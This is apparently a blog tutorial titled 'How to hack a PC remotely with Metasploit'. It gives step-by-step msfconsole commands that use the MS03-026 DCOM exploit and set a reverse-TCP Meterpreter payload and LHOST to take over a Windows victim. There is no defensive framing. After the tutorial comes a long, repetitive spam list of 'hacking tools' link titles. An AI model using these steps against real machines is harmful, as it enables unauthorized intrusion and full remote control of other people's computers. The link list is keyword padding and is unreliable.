HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Read more
  1. Hack Rom Tools
  2. Pentest Tools Download
  3. Nsa Hack Tools
  4. Hacking Tools For Mac
  5. Hacker Tools 2019
  6. Nsa Hack Tools Download
  7. Hackrf Tools
  8. Hacker Tools Apk
  9. Hack Rom Tools
  10. Pentest Reporting Tools
  11. Kik Hack Tools
  12. Hacking App
  13. Hacking Tools For Beginners
  14. Hacking Tools For Mac
  15. Pentest Tools Port Scanner
  16. Hacking Tools For Beginners
  17. Hack Website Online Tool
  18. Beginner Hacker Tools
  19. Hacking Tools Hardware
  20. Hacker Tools Mac
  21. Ethical Hacker Tools
  22. Hack Tool Apk
  23. Hack Tools For Ubuntu
  24. Pentest Tools For Android
  25. What Are Hacking Tools
  26. Hacking Tools Github
  27. Github Hacking Tools
  28. Black Hat Hacker Tools
  29. Pentest Reporting Tools
  30. Pentest Box Tools Download
  31. Computer Hacker
  32. Hacking App
  33. Pentest Reporting Tools
  34. Hacker Tools For Windows
  35. Hacking Tools Windows 10
  36. Pentest Tools Open Source
  37. Bluetooth Hacking Tools Kali
  38. Nsa Hack Tools
  39. Pentest Tools For Mac
  40. Hacker Security Tools
  41. Hacking Tools Software
  42. Hak5 Tools
  43. World No 1 Hacker Software
  44. Hack Apps
  45. Hacker
  46. Hacking Tools Windows
  47. Hack Tools Pc
  48. Hacking Tools For Windows Free Download
  49. Hacker Tools For Pc
  50. Hacking Tools For Games
  51. Hacker Search Tools
  52. Nsa Hack Tools Download
  53. How To Hack
  54. Nsa Hack Tools
  55. Computer Hacker
  56. Hacker Tools Software
  57. Hacker Tools Online
  58. Hacking Tools Windows 10
  59. Hacker
  60. Hack And Tools
  61. Hacking Tools Mac
  62. Underground Hacker Sites
  63. Github Hacking Tools
  64. Best Hacking Tools 2019
  65. Hacker Tools For Mac
  66. Hacker
  67. Hacks And Tools
  68. Pentest Tools Alternative
  69. What Are Hacking Tools
  70. Pentest Tools Find Subdomains
  71. Pentest Tools Website
  72. World No 1 Hacker Software
  73. Black Hat Hacker Tools
  74. Blackhat Hacker Tools
  75. Pentest Tools For Android
  76. Hack Tools Mac
  77. Pentest Tools Alternative
  78. Pentest Tools List
  79. Growth Hacker Tools
  80. Hacker Tools Free
  81. Hacking Tools For Mac
  82. Tools 4 Hack
  83. Pentest Tools Find Subdomains
  84. Hack App
  85. Free Pentest Tools For Windows
  86. Hack Tools For Mac
  87. Pentest Tools For Mac
  88. Hacking Tools Mac
  89. Hack Tools
  90. Hacking Tools For Pc
  91. Kik Hack Tools
  92. Hack Tools Pc
  93. Wifi Hacker Tools For Windows
  94. Pentest Automation Tools
  95. Hack Tools Pc
  96. Hacking Tools 2019
  97. Pentest Tools Free
  98. Pentest Tools For Ubuntu
  99. Underground Hacker Sites
  100. How To Hack
  101. Pentest Tools Find Subdomains
  102. Hacker Tools For Mac
  103. Nsa Hacker Tools
  104. Hack Tools Github
  105. Hacking Tools And Software
  106. Hacking Tools Windows 10
  107. Hacking Tools Name
  108. Pentest Recon Tools
  109. Tools For Hacker
  110. Nsa Hack Tools
  111. Pentest Tools For Ubuntu
  112. Pentest Reporting Tools
  113. World No 1 Hacker Software
  114. Pentest Tools Github
  115. Hacker Tools Hardware
  116. World No 1 Hacker Software
  117. Hacks And Tools
  118. Physical Pentest Tools
  119. Hack Tools For Windows
  120. Hacking App
  121. Pentest Tools Nmap
  122. Hacker
  123. Hacking Tools And Software
  124. Wifi Hacker Tools For Windows
  125. Top Pentest Tools
  126. Pentest Recon Tools
  127. Underground Hacker Sites
  128. Pentest Tools Tcp Port Scanner
  129. Hacker Tools Software
  130. Hack Tools For Ubuntu
  131. Hack Website Online Tool
  132. Pentest Tools Kali Linux
  133. Hacking Tools Pc
  134. Black Hat Hacker Tools
  135. Hacking Tools For Pc
  136. Hacker Tools Linux
  137. Termux Hacking Tools 2019
  138. Pentest Tools Review
  139. Hacking Tools For Windows
  140. Beginner Hacker Tools
  141. Pentest Tools Online
  142. Hacking Tools For Games
  143. Hacker Tools Hardware
  144. Beginner Hacker Tools
  145. Hack Tools For Ubuntu
  146. Pentest Tools Free
  147. Pentest Tools For Mac
  148. Hacking Apps
  149. Hacker Hardware Tools
  150. Pentest Tools Github
  151. Hacking App
  152. Pentest Tools For Android
  153. Hacker Tools Free Download
  154. Hack Tools For Mac
  155. Hack App
  156. Pentest Tools Url Fuzzer
  157. Pentest Tools Nmap
  158. Free Pentest Tools For Windows
  159. Pentest Tools Windows

沒有留言: